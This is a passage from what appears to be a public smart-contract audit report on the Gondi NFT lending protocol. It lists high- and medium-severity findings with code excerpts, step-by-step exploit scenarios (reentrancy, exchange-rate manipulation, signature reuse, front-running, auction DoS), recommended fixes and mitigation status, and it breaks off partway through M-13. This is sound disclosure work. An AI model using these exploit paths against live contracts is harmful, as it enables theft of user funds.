    • _loans\[2] = newOtherLoan.hash().

There will be _loans[2] and _loans[3], both containing NFT=1. Note: Both Loans ‘s lender are all himself:

  1. The user can repayLoan(_loans[2]) and get the NFT back.
  2. Use the NFT to borrow other people’s funds, e.g. to generate _loans[100].
  3. repayLoan(_loans[3]), get NFT back.

Add nonReentrant:

 function mergeTranches(uint256 _loanId, Loan memory _loan, uint256 _minTranche, uint256 _maxTranche)
+       nonReentrant
        returns (uint256, Loan memory)
        _baseLoanChecks(_loanId, _loan);
        uint256 loanId = _getAndSetNewLoanId();

    function refinancePartial(RenegotiationOffer calldata _renegotiationOffer, Loan memory _loan)
+       nonReentrant
        returns (uint256, Loan memory)

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

Added nonReentrant.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-15] _baseLoanChecks() check errors for expire

Submitted by bin2chen, also found by zhaojie and minhquanym

_baseLoanChecks() is used to check whether Loan has expired:

    function _baseLoanChecks(uint256 _loanId, Loan memory _loan) private view {
        if (_loan.hash() != _loans[_loanId]) {
            revert InvalidLoanError(_loanId);
@>      if (_loan.startTime + _loan.duration < block.timestamp) {
            revert LoanExpiredError();

The expiration checks in liquidation are as follows:

    function _liquidateLoan(uint256 _loanId, IMultiSourceLoan.Loan calldata _loan, bool _canClaim)
        returns (bool liquidated, bytes memory liquidation)

        uint256 expirationTime = _loan.startTime + _loan.duration;
@>      if (expirationTime > block.timestamp) {
            revert LoanNotDueError(expirationTime);

This way, both checks pass when block.timestamp == _loan.startTime + _loan.duration.

This leads to the problem that a malicious attacker can perform the following steps when block.timestamp == _loan.startTime + _loan.duration:

  1. Alice calls liquidateLoan (loandId = 1) -> success.

    • LoanLiquidator generates an auction.
    • _loans\[loandId = 1] is still valid , and will only be cleared when the auction is over.
  2. Alice call addNewTranche (loandId = 1) -> success.

    • _baseLoanChecks (loandId = 1) will pass.
    • delete _loans\[1];
    • _loans\[2] = newLoan.hash().
  3. Bidding ends, call loanLiquidated(loandId = 1) will fail , because _loans[1] has been cleared.


Maliciously disrupting the end of the bidding, causing the NFT/funds to be locked.

    function _baseLoanChecks(uint256 _loanId, Loan memory _loan) private view {
        if (_loan.hash() != _loans[_loanId]) {
            revert InvalidLoanError(_loanId);
-       if (_loan.startTime + _loan.duration < block.timestamp) {
+      if (_loan.startTime + _loan.duration <= block.timestamp) {
            revert LoanExpiredError();

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

Strict -> <=.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-16] validateOffer() reentry to manipulate exchangeRate

Submitted by bin2chen

The current mechanism of validateOffer() is to first book _outstandingValues to increase, but assets.balanceOf(address(this)) doesn’t decrease immediately.

    function validateOffer(bytes calldata _offer, uint256 _protocolFee) external override onlyAcceptedCallers {

        /// @dev Since the balance of the pool includes capital that is waiting to be claimed by the queues,
        ///      we need to check if the pool has enough capital to fund the loan.
        ///      If that's not the case, and the principal is larger than the currentBalance, then we need to reallocate
        ///      part of it.
        if (principalAmount > undeployedAssets) {
            revert InsufficientAssetsError();
        } else if (principalAmount > currentBalance) {
                currentBalance, principalAmount - currentBalance, true
@>      /// @dev If the txn doesn't revert, we can assume the loan was executed.
@>      _outstandingValues = _getNewLoanAccounting(principalAmount, _netApr(apr, _protocolFee));

I.e.: After this method is called, _getUndeployedAssets() is unchanged, but _getTotalOutstandingValue() is increased, so totalAssets() is increased, but totalSupply is unchanged, so exchangeRate is get bigger.

Originally, it was expected that after that, the Pool balance would be transferred at MultiSourceLoan, so _getUndeployedAssets() becomes smaller and exchangeRate returns to normal. But if it’s possible to do callback malicious logic before MultiSourceLoan transfers away the Pool balance, it’s possible to take advantage of this exchangeRate that becomes larger.

Example: Suppose _getUndeployedAssets() = 1000, _getTotalOutstandingValue() = 1000 and totalSupply = 2000.


totalAssets() = 2000 exchangeRate = 1:1

  1. Alice calls MultiSourceLoan.emitLoan().

    • offer.lender = pool.
    • offer.principalAmount = 500.
    • offer.validators = CustomContract -> for callback.
  2. emitLoan() -> Pool.validateOffer().

    • _getUndeployedAssets() = 1000 (no change).
    • _getTotalOutstandingValue() = 1000 + 500 = 1500 (more 500).
    • totalAssets() = 2500.
    • exchangeRate = 1.25 : 1.
  3. emitLoan() -> _checkValidators() -> CustomContract.validateOffer()

    • In CustomContract.validateOffer() call pool.redeem (shares) use exchangeRate = 1.25 : 1 to get more assets.
  4. emitLoan() -> asset.safeTransferFrom (pool, receiver, 500).

    • _getUndeployedAssets() = 500.
    • exchangeRate Expect to return to normal.


Manipulating the exchangeRate to redeem additional assets.

In validateOffer(), restrict offer.validators to be an empty array to avoid callbacks.

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

validateOffer changed to view so validators cannot change state.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-17] refinanceFull/addNewTranche reusing a lender’s signature leads to unintended behavior

Submitted by bin2chen



Vulnerability details

In MultiSourceLoan, refinanceFull() and addNewTranche() use the same signature.

    function refinanceFull(
        RenegotiationOffer calldata _renegotiationOffer,
        Loan memory _loan,
        bytes calldata _renegotiationOfferSignature
    ) external nonReentrant returns (uint256, Loan memory) {
        if (lenderInitiated) {
            if (_isLoanLocked(_loan.startTime, _loan.startTime + _loan.duration)) {
                revert LoanLockedError();
                _renegotiationOffer.duration + block.timestamp,
                _loan.duration + _loan.startTime,
                totalAnnualInterest / _loan.principalAmount,
        } else if (msg.sender != _loan.borrower) {
            revert InvalidCallerError();
        } else {
            /// @notice Borrowers clears interest
@>          _checkSignature(_renegotiationOffer.lender, _renegotiationOffer.hash(), _renegotiationOfferSignature);
            netNewLender -= totalAccruedInterest;
            totalAccruedInterest = 0;
    function addNewTranche(
        RenegotiationOffer calldata _renegotiationOffer,
        Loan memory _loan,
        bytes calldata _renegotiationOfferSignature
    ) external nonReentrant returns (uint256, Loan memory) {
        uint256 loanId = _renegotiationOffer.loanId;

        _baseLoanChecks(loanId, _loan);
        _baseRenegotiationChecks(_renegotiationOffer, _loan);
@>      _checkSignature(_renegotiationOffer.lender, _renegotiationOffer.hash(), _renegotiationOfferSignature);
        if (_loan.tranche.length == getMaxTranches) {
            revert TooManyTranchesError();

So when lender signs RenegotiationOffer, it is meant to replace tranche, i.e. execute refinanceFull(). But a malicious user can use this sign and front-run execute addNewTranche().

addNewTranche() doesn’t limit the RenegotiationOffer too much. The newly generated Loan will be approximately twice the total amount borrowed, and the risk of borrowing against the lender will increase dramatically.


Maliciously using the signature of refinanceFull() to execute addNewTranche() will result in approximately double the borrowed amount, and the risk of borrowing will increase dramatically.

In RenegotiationOffer, add a type field to differentiate between signatures.

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

Check trancheIndex to differentiate between refiFull/addNewTranche.

Status: Unmitigated. Full details in reports from minhquanym, bin2chen and oakcobalt, and also included in the Mitigation Review section below.

Medium Risk Findings (20)

[M-01] Invalid maxTranches check can result in maxTranche cap to be exceeded

Submitted by oakcobalt, also found by minhquanym and bin2chen

In src/lib/loans/MultiSourceLoan.sol, there’s max cap for the number of tranches in a loan as defined as getMaxTranches. This cap can be exceeded.

There are two main vulnerabilities:

  1. getMaxTranches is not checked in some key flows where tranches can be added. These including emitLoan(), refinancePartial()(-> _addTrancheFromPartial()), refinanceFromLoanExecutionData().
  2. Where getMaxTranches is checked, the check is invalid. Only _loan.tranche.length == getMaxTranches is checked. But combined with (1), when number of tranches exceeds getMaxTranches in other flows, this check is invalid.
    function addNewTranche(
        RenegotiationOffer calldata _renegotiationOffer,
        Loan memory _loan,
        bytes calldata _renegotiationOfferSignature
    ) external nonReentrant returns (uint256, Loan memory) {
          //@audit change to _loan.tranch.length >= getMaxTranches
|>        if (_loan.tranche.length == getMaxTranches) {
            revert TooManyTranchesError();


Add missing checks on getMaxTranches for all flows that might add tranches. In addNewTranche, change into _loan.tranch.length >= getMaxTranches.

0xend (Gondi) confirmed

Gondi mitigated:

Check total tranches + min amount per tranche.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[M-02] A malicious user can take on a loan using an existing borrower’s collateral in refinanceFromLoanExecutionData()

Submitted by oakcobalt

In MultiSourceLoan.sol, refinanceFromLoanExecutionData() doesn’t check whether _loan.borrower == _loanExecutionData.borrower, which is open rooms for exploits.

BorrowerB (malicious) can sign a _loanExecutionData offer and initiate a refinanceFromLoanExecutionData() call with Borrower A’s loan. Borrower B will use Borrower A’s collateral for his loan.

There are (2) vulnerabilities here:

  1. _validateExecutionData will not check whether _loan.borrower == _executionData.borrower. In addition, it will directly bypass the check on executionData’s borrower signature as long as msg.sender!=_loan.borrower.
  2. refinanceFromLoanExecutionData() doesn’t check whether the new loanExecutiondata (_loanExecutionData) has the same nft tokenId(executionData.tokenId) as the existing loan(_loan.nftCollateralTokenId).

As a result, if _loanExecutionData.borrower (Borrower B) initiates refinanceFromLoanExecutionData() call, the following would happen:

  • msg.sender != _loan.borrower (Borrwer A), this bypass _validateExecutionData’s signature check. Also, it will not revert because no checks on address _borrower(loan.borrower==_loanExecutionData.borrower;.
  • There is no check on _loanExecutionData.tokenId. As long as _loan and _loanExecutionData has the same principalAddress and the same nftCollateralAddress, _processOffersFromExecutionData() will succeed in transferring principal loans to Borrower B.
  • As long as the _loan.borrower (Borrower A) has the funds for repayment. (Note: Borrower A might have approved MultiSourceLoan.sol for asset transfer if they are ready for repayments.), the tx will succeed and Borrower A’s collateral will continually be locked for Borrower B’s new loan.

The above steps can also happen in a front-running scenario, where Borrower B sees that Borrower A approves MultiSourceLoan.sol for loan repayments and front-run Borrower A’s repayment with a new loan.

In _validateExecutionData, consider adding checks to ensure address _borrower == _executionData.borrower.

0xend (Gondi) confirmed

Note: For full discussion, see here.

Gondi mitigated:

Checking signature from the existing borrower.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[M-03] Function addNewTranche() should use protocolFee from Loan struct

Submitted by minhquanym

The protocol fee value is recorded and stored in the Loan struct when a new loan is issued. However, when adding a new tranche, the function uses the current value of protocolFee.fraction instead of the value stored in the Loan struct. This could result in inconsistencies in fee collection, as the protocol fee value might be updated by the admin, while the value stored in the Loan struct remains unchanged.

if (_renegotiationOffer.fee > 0) {
    /// @dev Cached
    ProtocolFee memory protocolFee = _protocolFee;
        _renegotiationOffer.fee.mulDivUp(protocolFee.fraction, _PRECISION) // @audit Use protocolFee from Loan instead

Proof of Concept

The protocol fee value is stored in the Loan struct when a new loan is opened.

function _processOffersFromExecutionData(
) ... {
  Loan memory loan = Loan(

Consider using _loan.protocolFee instead of protocolFee.fraction in the addNewTranche() function.

0xend (Gondi) confirmed

Gondi mitigated:

addNewTranche uses protocolFee from struct.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[M-04] Function Pool.validateOffer() does not work correctly in case principalAmount > currentBalance

Submitted by minhquanym, also found by oakcobalt and bin2chen

In the Pool contract, undeployed funds could be deposited to Aave or Lido to earn base yield. When an offer of Pool is accepted from MultiSourceLoan, the function validateOffer() is called to validate the terms and also to pull the undeployed funds back in case the contract balance is insufficient.

if (principalAmount > undeployedAssets) {
    revert InsufficientAssetsError();
} else if (principalAmount > currentBalance) {
        currentBalance, principalAmount - currentBalance, true // @audit Incorrect

However, the input params of reallocate() are incorrect, resulting in the contract balance might still be insufficient for the loan after calling the function.

Proof of Concept

Consider the scenario:

  1. Assume we have currentBalance = 500, baseRateBalance = 1000 usdc and principalAmount = 700 usdc.
  2. Since the current contract balance is insufficient (500 < 700), reallocate() will be called with input:
reallocate(currentBalance, principalAmount - currentBalance, true)
reallocate(500, 200, true)
  1. In function reallocate() shown in the code snippet below, we can see that in case _currentIdle > _targetIdle, the contract even deposits more funds to AavePool instead of withdrawing.
function reallocate(uint256 _currentIdle, uint256 _targetIdle, bool) external {
    address pool = _onlyPool();
    if (_currentIdle > _targetIdle) {
        uint256 delta = _currentIdle - _targetIdle;
        ERC20(_usdc).transferFrom(pool, address(this), delta);
        IAaveLendingPool(_aavePool).deposit(_usdc, delta, address(this), 0);
    } else {
        uint256 delta = _targetIdle - _currentIdle;
        IAaveLendingPool(_aavePool).withdraw(_usdc, delta, address(this));
        ERC20(_usdc).transfer(pool, delta);

    emit Reallocated(_currentIdle, _targetIdle);

Call reallocate(0, principalAmount - currentBalance, true) instead.

0xA5DF (judge) decreased severity to Medium and commented:

If I understand correctly, the impact is DoS that occurs only under certain conditions; in that case, I think severity should be Medium.

0xend (Gondi) confirmed and commented:

Agree on the issue. I think it’s Medium, not High.

Gondi mitigated:

Changed to reallocate (currentBalance, principalAmount, true) instead of proposed solution (same result) to be compliant with the interface.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[M-05] Collected fees are never transferred out of Pool contract

Submitted by minhquanym, also found by oakcobalt and bin2chen

Lenders in the Gondi protocol could be EOA or Gondi Pool. The Gondi Pool, an ERC4626, allows anyone to deposit funds and earn yield from lending on Gondi. When a loan is repaid or liquidated, the pool deducts a fee from the received amount before adding the rest to the pool balance. As shown in the loanRepayment() function, the fees are calculated by calling processFees() and then added to getCollectedFees. After that, the accounting function _loanTermination() is called with the amount being received - fees.

However, this fee is credited to getCollectedFees but never transferred out of the pool. As a result, these funds remain locked in the contract indefinitely.

function loanRepayment(
    uint256 _loanId,
    uint256 _principalAmount,
    uint256 _apr,
    uint256 _protocolFee,
    uint256 _startTime
) external override onlyAcceptedCallers {
    uint256 netApr = _netApr(_apr, _protocolFee);
    uint256 interestEarned = _principalAmount.getInterest(netApr, block.timestamp - _startTime);
    uint256 received = _principalAmount + interestEarned;
    uint256 fees = IFeeManager(getFeeManager).processFees(_principalAmount, interestEarned);
    getCollectedFees += fees; // @audit getCollectedFees is never transfer out
    _loanTermination(msg.sender, _loanId, _principalAmount, netApr, interestEarned, received - fees);

Proof of Concept

The processFees() function only calculates the fee but doesn’t transfer anything.

function processFees(uint256 _principal, uint256 _interest) external view returns (uint256) {
    /// @dev cached
    Fees memory __fees = _fees;
    return _principal.mulDivDown(__fees.managementFee, PRECISION)
        + _interest.mulDivDown(__fees.performanceFee, PRECISION);

Then after getCollectedFees is credited for fees, we can see this getCollectedFees is never transferred out of the pool.

Add a function to collect the credited fees getCollectedFees from the pool in the FeeManager contract.

0xend (Gondi) confirmed and commented:

Not sure if it’s High; tend to think as high as those that would compromise user’s assets. Definitely an issue though.

0xA5DF (judge) decreased severity to Medium and commented:

Marking as med as fees falls under the definition ‘leak of value’.

Gondi mitigated:

Added collectFees method.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[M-06] Anyone can remove existing term without queueing through setTerms()

Submitted by minhquanym

In PoolOfferHandler, new terms require a two-step process for setting (setTerms() and confirmTerms()). The setTerm() function is onlyOwner, but the confirmTerms() function can be called by anyone. This function uses the provided input __terms from the caller to execute the logic. This could enable an attacker to remove all existing terms, even if the owner does not intend to do so (without pending through the setTerms() function).

function confirmTerms(TermsKey[] calldata _termKeys, Terms[] calldata __terms) external { 
    if (block.timestamp - pendingTermsSetTime < NEW_TERMS_WAITING_TIME) {
        revert TooSoonError();
    for (uint256 i = 0; i < __terms.length; i++) {
        if (_termKeys[i].duration > getMaxDuration) {
            revert InvalidDurationError();
        uint256 pendingAprPremium = _pendingTerms[_termKeys[i].collection][_termKeys[i].duration][_termKeys[i]
        // @audit Can be used to remove terms without pending through setTerm()
        if (pendingAprPremium != __terms[i].aprPremium) {
            revert InvalidTermsError();
            .principalAmount] = __terms[i].aprPremium;
        delete _pendingTerms[_termKeys[i].collection][_termKeys[i].duration][_termKeys[i]
    pendingTermsSetTime = type(uint256).max;

    emit TermsSet(_termKeys, __terms);

Proof of Concept

Consider the following scenario:

  1. The pool has 5 existing terms. Now the owner wants to create a new term in the Pool, so they call setTerms() with the __terms they want to set up. The new term is pending confirmation after a waiting period.
  2. After NEW_TERMS_WAITING_TIME, an attacker calls confirmTerms() with _termKeys set to all 5 existing terms and __terms.aprPremium = 0.
  3. The function executes with the input provided by the attacker. Since the pendingAprPremium of these terms is reset to 0 after it is confirmed earlier, the check if (pendingAprPremium != __terms[i].aprPremium) is bypassed. The attacker could set the _terms[][][][] mapping of existing loans to 0.

Only allow the owner to call confirmTerms().

Assessed type

Invalid Validation

0xend (Gondi) confirmed

Gondi mitigated:

Terms must be passed in the confirm as well.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[M-07] Attacker can front-run and pass in empty terms, making it impossible to confirmTerms()

Submitted by minhquanym, also found by zhaojie and bin2chen

In PoolOfferHandler, setting new terms requires two steps (setTerms() and confirmTerms()). The setTerm() function is onlyOwner, but anyone can call the confirmTerms() function. At the end of the confirmTerms() function, pendingTermsSetTime is set to type(uint256).max, preventing the function from being called again.

Since confirmTerms() uses the caller’s input to execute the setup, an attacker could input empty __terms to prevent the owner from setting up new terms.

Proof of Concept

// @audit Anyone can front-run and pass in empty terms, making it impossible to confirmTerms
function confirmTerms(TermsKey[] calldata _termKeys, Terms[] calldata __terms) external { 
    if (block.timestamp - pendingTermsSetTime < NEW_TERMS_WAITING_TIME) {
        revert TooSoonError();
    for (uint256 i = 0; i < __terms.length; i++) {
        if (_termKeys[i].duration > getMaxDuration) {
            revert InvalidDurationError();
        uint256 pendingAprPremium = _pendingTerms[_termKeys[i].collection][_termKeys[i].duration][_termKeys[i]
        if (pendingAprPremium != __terms[i].aprPremium) {
            revert InvalidTermsError();
            .principalAmount] = __terms[i].aprPremium;
        delete _pendingTerms[_termKeys[i].collection][_termKeys[i].duration][_termKeys[i]
    pendingTermsSetTime = type(uint256).max;

    emit TermsSet(_termKeys, __terms);

In this function, it loops through the input __terms.length list. If an attacker calls confirmTerms() with an empty __terms list, there will be no terms set, and pendingTermsSetTime is still set to type(uint256).max.

As a result, the owner will never be able to set up new terms for the pool because the attacker keeps spamming confirmTerms() when the NEW_TERMS_WAITING_TIME passes after the owner calls setTerms().

Record the __terms list in the setTerms() function to confirm terms instead of using input from caller.

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

Terms must be passed in the confirm as well.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[M-08] Borrower signature could be reused in emitLoan()

Submitted by minhquanym

The function emitLoan() is used to issue a new loan. This function could be called directly by the borrower or by a random address if the borrower has signed the LoanExecutionData.

function emitLoan(LoanExecutionData calldata _loanExecutionData)
    returns (uint256, Loan memory)
    address borrower = _loanExecutionData.borrower;
    ExecutionData calldata executionData = _loanExecutionData.executionData;
    (address principalAddress, address nftCollateralAddress) = _getAddressesFromExecutionData(executionData);

    OfferExecution[] calldata offerExecution = executionData.offerExecution;

    // @audit Check borrower signature or borrower is caller
    _validateExecutionData(_loanExecutionData, borrower); 

function _validateExecutionData(LoanExecutionData calldata _executionData, address _borrower) private view {
    if (msg.sender != _borrower) {
            _executionData.borrower, _executionData.executionData.hash(), _executionData.borrowerOfferSignature
    if (block.timestamp > _executionData.executionData.expirationTime) {
        revert ExpiredOfferError(_executionData.executionData.expirationTime);

However, there isn’t a check to ensure the signature for the same LoanExecutionData can’t be used to execute emitLoan() more than once. As a result, if the borrower repays the loan, an attacker could call emitLoan() again to initiate a new loan.

Proof of Concept

Consider this scenario:

  1. Lender Alice has an offer with a capacity of 50 ETH.
  2. Borrower Bob signs a signature to take a 10 ETH loan with his NFT.
  3. After Bob repays the loan, anyone can call emitLoan() using the previous signature to force Bob to take the 10 ETH loan again. Since the capacity of Alice’s offer is 50 ETH, the signature can be reused up to 5 times.

Add a nonce to ensure a signature cannot be reused.

0xend (Gondi) acknowledged and commented:

This could be the case but don’t think is high given the struct has an expiration time to contemplate this. Borrower can avoid any issue by setting this to be close to the execution. Loans lasts for months, this will be at most a few hours.

To avoid an extra write+read, I’d probably make it very clear to the consumer of the smart contract.

0xA5DF (judge) decreased severity to Medium and commented:

Marking as Medium due to sponsor comment. This requires some external conditions which don’t seem to be easily satisfied.

0xend (Gondi) commented:

For the replay to happens:

  • Borrower needs to set an expiration longer than the intended time in which they’ll repay the loan.
  • All lender offers must not expire before the loan is repaid AND have capacity.

Borrower has no reason to set this variable longer than block.timestamp + small delta (the time it remains in the mempool).

Gondi mitigated:

Borrower should always set block.timestamp + small time delta as expiration to control when the loan can be started.

Status: Mitigation confirmed. Full details in reports from oakcobalt and bin2chen.

[M-09] Inconsistent accounting of undeployedAssets might result in undesired optimal range in the pool

Submitted by oakcobalt, also found by bin2chen

undeployedAssets is calculated inconsistently. Currently in _getUndeployedAssets() the protocol collected fees are subtracted; however, in validateOffer, the protocol collected fees are not subtracted.

  1. _getUndeployedAssets(): This is called in deployWithdrawalQueue() to calculate proRata liquid assets to the queue.contractAddress.
    function _getUndeployedAssets() private view returns (uint256) {
        return asset.balanceOf(address(this)) + IBaseInterestAllocator(getBaseInterestAllocator).getAssetsAllocated()
|>            - getAvailableToWithdraw - getCollectedFees;
  1. uint256 undeployedAssets: This is manually calculated in validateOffer flow, which is used check whether the pool has enough undeployed Assets to cover loan.principalAmount.
    function validateOffer(bytes calldata _offer, uint256 _protocolFee) external override onlyAcceptedCallers {
        uint256 currentBalance = asset.balanceOf(address(this)) - getAvailableToWithdraw;
        uint256 baseRateBalance = IBaseInterestAllocator(getBaseInterestAllocator).getAssetsAllocated();
         //@audit getCollectedFees is not subtracted
|>        uint256 undeployedAssets = currentBalance + baseRateBalance;
        (uint256 principalAmount, uint256 apr) = IPoolOfferHandler(getUnderwriter).validateOffer(
            IBaseInterestAllocator(getBaseInterestAllocator).getBaseAprWithUpdate(), _offer


Note that in (2), undeployedAssets are inflated because getCollectedFees are fees protocol collected from liquidation/repayment flows and shouldn’t be considered as liquid assets to cover the loan principal amount.

  1. _reallocate(): This also manually calculate total undeployedAssets amount, but again didn’t account for getCollectedFees. _reaalocate() balances optimal target idle assets ratio by checking currentBalance/total ratio. Here, currentBalance should be additionally subtracted by getCollectedFees because fees are set aside and shouldn’t be considered idle. This affects optimal range check.
    function _reallocate() private returns (uint256, uint256) {
        /// @dev Balance that is idle and belongs to the pool (not waiting to be claimed)
        uint256 currentBalance = asset.balanceOf(address(this)) - getAvailableToWithdraw;
        if (currentBalance == 0) {
            revert AllocationAlreadyOptimalError();
        uint256 baseRateBalance = IBaseInterestAllocator(getBaseInterestAllocator).getAssetsAllocated();
        uint256 total = currentBalance + baseRateBalance;
        uint256 fraction = currentBalance.mulDivDown(PRINCIPAL_PRECISION, total);


Inconsistent accounting in various flows may result in incorrect checks or undesirable optimal ranges.

Account for getCollectedFees in (2) and (3), noted above.

0xend (Gondi) confirmed

Gondi mitigated:

Missing collected fees in accounting.

Status: Mitigation confirmed. Full details in reports from oakcobalt and minhquanym.

[M-10] Any liquidators can pretend to be a loan contract to validate offers, due to insufficient validation

Submitted by oakcobalt

Accepted callers in a loan manager (e.g. Pool.sol) can be either liquidators or loan contracts.

And only loan contracts should validate offers during a loan creation. However, the current access control check is insufficient in pool::validateOffer, which allows liquidators to pretend to be a loan contract, and directly modify storage (__outstandingValues) bypassing additional checks and accounting in a loan contract.

    //@audit onlyAcceptedCallers only doesn't ensure caller is a loan contract
|>    function validateOffer(bytes calldata _offer, uint256 _protocolFee) external override onlyAcceptedCallers {
        if (!isActive) {
            revert PoolStatusError();


Current access control check (onlyAcceptedCallers) only ensures caller is accepted caller but doesn’t verify the caller is a loan contract (_isLoanContract(caller)``==true).

    modifier onlyAcceptedCallers() {
        if (!_acceptedCallers.contains(msg.sender)) {
            revert CallerNotAccepted();

When a liquidator calls validateOffer, they can provide a fabricated bytes calldata _offer and uint256 _protocolFee bypassing additional checks and state accounting in a loan contract. For example, in MultiSourceLoan.sol- emitLoan, extra checks are implemented on LoanExecutionData to verify borrower and lender signatures and offer expiration timestamp as well as transfer collateral NFT tokens and recoding loan to storage. All of the above can be skipped if a liquidator directly call validateOffer and modify __outstandingValues without token transfer.

In Pool::validateOffer, consider adding a check to ensure _isLoanContract(msg.sender)``==true.

Assessed type

Invalid Validation

0xend (Gondi) acknowledged and commented:

This is a low one given these contracts must all live within our ecosystem and be whitelisted. Given there’s already that trust assumption, not doing that check to save some gas on an extra state read.

0xA5DF (judge) commented:

This is a low one given these contracts must all live within our ecosystem and be whitelisted.

That makes sense. However, I’m judging this based on the info that was present to the wardens in the README and docs. Given that that trust assumption wasn’t noted there I’m going to sustain Medium severity.

Gondi mitigated:

Check loanContract.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[M-11] AuctionLoanLiquidator#placeBid can be DoS

Submitted by zhaojie, also found by bin2chen

The attacker performs a DoS attack on the Bid function, causing other users to be unable to participate and eventually obtaining the NFT at a low price.

Proof of Concept

The placeBid function requires each bid to increase by 5% from the original, locking in for a period of time after each bid.

function placeBid(address _nftAddress, uint256 _tokenId, Auction memory _auction, uint256 _bid)
        returns (Auction memory)
        _placeBidChecks(_nftAddress, _tokenId, _auction, _bid);

        uint256 currentHighestBid = _auction.highestBid;
        // MIN_INCREMENT_BPS = 10000, _BPS = 500 , add 5%
        if (_bid == 0 || (currentHighestBid.mulDivDown(_BPS + MIN_INCREMENT_BPS, _BPS) >= _bid)) {
            revert MinBidError(_bid);

        uint256 currentTime = block.timestamp;
        uint96 expiration = _auction.startTime + _auction.duration;
@>      uint96 withMargin = _auction.lastBidTime + _MIN_NO_ACTION_MARGIN;
        uint96 max = withMargin > expiration ? withMargin : expiration;
        if (max < currentTime && currentHighestBid > 0) {
            revert AuctionOverError(max);

The problem here is that if the initial price increases from a very small value, the second increase in percentage only needs to be a very small amount. For example: 100 wei -> 105 wei -> 110 wei.

So an attacker can start with a small bid and keep growing slowly. Because of the time lock, other users cannot participate for a period of time. Normal users must wait until the time lock is over and the transaction needs to be executed before the attacker.

If normal users are unable to participate in the bidding, the attacker can obtain the auction item (NFT) at a very low price.

Tools Used


function placeBid(.....){
+       require (_bid > MIN_BID);

Assessed type


0xA5DF (judge) commented:

Given that auction duration is 3 days front-running every single tx in that timeframe isn’t going to be easy for the attacker. Considering Medium.

0xend (Gondi) confirmed and commented:

We have a check that for an auction to be settled it also requires the last bid to be at least 10’ old (to avoid someone sniping at the very end). Given this, someone doing this attack, would actually have to continue going for an indiscriminate amount of time since honest players would be able to bid and extend it.

I think this is Low/Medium.

0xA5DF (judge) decreased severity to Medium and commented:

The attack seems very unlikely, but given that the impact can be quite high, I’m sustaining Medium severity.

0xend (Gondi) commented:


Starting with a min based on principle to make sure it’s meaningful.

Gondi mitigated:

There’s a min bid now. This + the min improvement invalidates DoS.

Status: Mitigation confirmed. Full details in reports from oakcobalt and minhquanym.

[M-12] Pool.getMinTimeBetweenWithdrawalQueues current calculations may not be sufficient

Submitted by bin2chen

getMinTimeBetweenWithdrawalQueues is very important for Pool. If getMinTimeBetweenWithdrawalQueues is too small, pendingQueues will be overwritten too early, and when Loan pays off, it won’t be able to find the corresponding queues.

So we will calculate getMinTimeBetweenWithdrawalQueues by MaxDuration + _LOAN_BUFFER_TIME to make sure it won’t be overwritten too early.

Currently: _LOAN_BUFFER_TIME = 7 days Similarly: LiquidationHandler.MAX_AUCTION_DURATION = 7 days

So getMinTimeBetweenWithdrawalQueues is sufficient if the bidding is done within the time period. However, less consideration is given to the presence of AuctionLoanLiquidator._MIN_NO_ACTION_MARGIN and the bidding can be delayed.

    function placeBid(address _nftAddress, uint256 _tokenId, Auction memory _auction, uint256 _bid)
        returns (Auction memory)
        uint256 currentTime = block.timestamp;
        uint96 expiration = _auction.startTime + _auction.duration;
        uint96 withMargin = _auction.lastBidTime + _MIN_NO_ACTION_MARGIN;
@>      uint96 max = withMargin > expiration ? withMargin : expiration;
        if (max < currentTime && currentHighestBid > 0) {
            revert AuctionOverError(max);

If the bidding is intense, it may be delayed > _MIN_NO_ACTION_MARGIN =10 minutes, or even longer. So getMinTimeBetweenWithdrawalQueues may not be enough. Suggest adding an extra day: MaxDuration + _LOAN_BUFFER_TIME + 3 days.


getMinTimeBetweenWithdrawalQueues is not large enough causing pendingQueues to be overwritten prematurely.

contract Pool is ERC4626, InputChecker, IPool, IPoolWithWithdrawalQueues, LoanManager, ReentrancyGuard {

    /// @dev Used in case loans might have a liquidation, then the extension is upper bounded by maxDuration + liq time.
-   uint256 private constant _LOAN_BUFFER_TIME = 7 days;
+   uint256 private constant _LOAN_BUFFER_TIME = 10 days;

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

Limit auction extensions.

Status: Unmitigated. Full details in reports from bin2chen, and also included in the Mitigation Review section below.

[M-13] confirmBaseInterestAllocator() change BaseInterestAllocator may pay large getReallocationBonus

Submitted by bin2chen

owner can submit getPendingBaseInterestAllocator first, and then anyone can enable it by confirmBaseInterestAllocator().

    function confirmBaseInterestAllocator(address _newBaseInterestAllocator) external {
        address cachedAllocator = getBaseInterestAllocator;
        if (cachedAllocator != address(0)) {
            if (getPendingBaseInterestAllocatorSetTime + UPDATE_WAITING_TIME > block.timestamp) {
                revert TooSoonError();
            if (getPendingBaseInterestAllocator != _newBaseInterestAllocator) {
                revert InvalidInputError();
@>          IBaseInterestAllocator(cachedAllocator).transferAll();
            asset.approve(cachedAllocator, 0);
        asset.approve(_newBaseInterestAllocator, type(uint256).max);

        getBaseInterestAllocator = _newBaseInterestAllocator;
        getPendingBaseInterestAllocator = address(0);
        getPendingBaseInterestAllocatorSetTime = type(uint256).max;

        emit BaseInterestAllocatorSet(_newBaseInterestAllocator);

The current logic is:

  1. Take all the balance of the old BaseInterestAllocator and put it in Pool.
  2. Change getBaseInterestAllocator to the new BaseInterestAllocator.

